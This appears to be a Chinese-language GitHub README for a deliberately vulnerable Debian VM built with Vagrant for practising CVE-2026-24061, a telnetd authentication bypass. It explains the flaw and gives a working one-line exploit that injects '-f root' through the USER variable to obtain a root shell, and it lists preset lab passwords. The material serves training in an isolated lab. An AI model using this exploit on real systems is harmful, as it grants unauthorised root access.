RStephanH/vuln-deb

GitHub: RStephanH/vuln-deb

一个用于在隔离环境中练习利用CVE-2026-24061实现Telnet认证绕过的Debian漏洞练习虚拟机。

Stars: 2 | Forks: 0

# vuln-deb 一个用于练习利用 **CVE-2026-24061** 的存在漏洞的 Debian 虚拟机 —— 该漏洞是 GNU InetUtils `telnetd` 中的关键认证绕过问题。 ## 漏洞详情:CVE-2026-24061 | 属性 | 说明 | |---|---| | **受影响软件** | GNU InetUtils `telnetd` 1.9.3 – 2.7 | | **CVSS 评分** | 9.8(严重) | | **是否需要认证** | 否 | | **是否需要用户交互** | 否 | | **影响** | 直接获得 root 权限 | ### 根本原因 受影响版本的 `telnetd` 会将客户端提供的 `USER` 环境变量未经任何清理直接作为命令行参数传递给 `/usr/bin/login`。因为 `/usr/bin/login` 会将以 `-f` 开头的参数视为“免认证”标志,攻击者可以通过注入 `-f root` 作为用户名,完全绕过认证并获得 root 权限的 Telnet shell —— 无需密码。 ### 利用方法 ``` # 从您的主机: USER='-f root' telnet -a 192.168.56.10 ``` `-a` 选项会让 Telnet 客户端在协商阶段自动发送 `USER` 环境变量。服务器会将其原样传递给 `login -f root`,跳过密码验证并直接进入 root shell。 ### 实验室凭据(由配置脚本预设) | 账户 | 密码 | |---|---| | `student` | `student123` | | `root` | `toor` | 旗标文件位于 `/root/flag.txt`(仅 root 可读 —— 利用 CVE-2026-24061 后可获取)。 ## 本仓库提供的内容 - 基于 `debian/bookworm64` 的 Vagrant 虚拟机 - 私有主机专用网络,地址为 `192.168.56.10` - 自动配置脚本,安装 GNU InetUtils 2.7 并搭建易受攻击的环境 ## 先决条件 请在主机上安装以下工具: - [Vagrant](https://developer.hashicorp.com/vagrant/downloads) - [VirtualBox](https://www.virtualbox.org/wiki/Downloads) ## 启动并运行虚拟机 在仓库根目录下执行: ``` vagrant up ``` 该命令会: - 创建虚拟机 - 运行 `provision/setup.sh` - 配置易受攻击的 Telnet 实验环境 ## 访问虚拟机 ``` vagrant ssh ``` ## 快速验证 从主机检查目标是否可达: ``` telnet 192.168.56.10 23 ``` ## 停止、重启与销毁 ``` vagrant halt # stop VM vagrant reload # restart VM vagrant destroy # delete VM ```
标签:CISA项目, CVE-2026-24061, Debian, GNU InetUtils, Host-only 网络, Root Shell, Telnet, Vagrant, VirtualBox, 命令行注入, 实验环境, 开放策略代理, 根权限, 漏洞复现, 漏洞实验, 网络服务漏洞, 自动化配置, 认证绕过, 配置修复, 预认证绕过